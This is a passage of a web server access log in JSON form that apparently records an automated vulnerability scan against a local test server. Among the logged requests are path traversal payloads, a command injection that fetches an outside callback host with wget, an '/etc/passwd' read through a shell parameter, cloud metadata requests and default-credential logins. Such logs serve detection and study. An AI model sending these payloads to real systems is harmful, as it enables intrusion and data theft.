HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:06 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/graphiql.css HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:06 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/graphiql.js HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:06 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/graphiql.min.css HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:06 +0000","request_body":"_fun_function=HTTP_Authenticate_fn&NextPage=%2Fproperties%2Fauthentication%2FluidLogin.php&webUsername=admin&webPassword=1111&frmaltDomain=default","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /userpost/xerox.set HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:06 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/graphiql.min.js HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:06 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/graphiql.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Videos/1/hls/m/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:06 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/graphiql/finland HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sslmgr HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:06 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:06 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/graphql-explorer HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:06 +0000","request_body":"{\x22name\x22:\x22\x22,\x22before\x22:\x22\x22,\x22after\x22:\x22\x22,\x22direction\x22:\x22desc\x22,\x22order_by\x22:\x22date\x22,\x22num_of_rows\x22:100}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /ui/api/v1/global-search/builds?jfLoader=true HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.064","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:06 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/graphql.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.063","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"5.004","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /interlib/report/ShowImage?localPath=C:\x5CWindows\x5Csystem.ini HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"5.004","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?pretty HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"5.002","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /guest_auth/poc.php?cmd=cat%20/etc/passwd HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"5.001","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:07 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/graphql/console HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.079","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:07 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/graphql/schema.json HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:07 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/graphql/schema.xml HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:07 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/graphql/schema.yaml HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:07 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/playground HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:07 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/subscriptions HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:07 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:07 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/altair HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.sqlitedb HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"5.000","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:07 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/api/graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:07 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/explorer HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /interlib/report/ShowImage?localPath=C:\x5CWindows\x5Csystem.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?pretty HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.056","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_cat/indices?v HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_all/_search HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /guest_auth/poc.php?cmd=cat%20/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.sqlitedb HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/64 HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"5.001","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.sql.7z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.sql.bz2 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.sql.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /moto/application/configs/application.ini HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"5.000","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.sql.lz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.sql.rar HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.sql.tar.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.sql.xz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.sql.zip HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.sql.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.sql.tar.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /moto/application/configs/application.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Partners/application/configs/application.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /backupmgt/localJob.php?session=fail;wget http://c9v8ia8smpv8c8qg07h0uc34on1yuh5ax.oast.me; HTTP/1.1","status":"400","body_bytes_sents":"0","req_time":"7.185","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"169.254.169.254","request":"GET http://169.254.169.254/v1/metadata/private-networks HTTP/1.1","status":"400","body_bytes_sents":"0","req_time":"6.203","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"169.254.169.254","request":"GET http://169.254.169.254/opc/v1/instance HTTP/1.1","status":"400","body_bytes_sents":"0","req_time":"9.695","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /radio/application/configs/application.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /seminovos/application/configs/application.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel 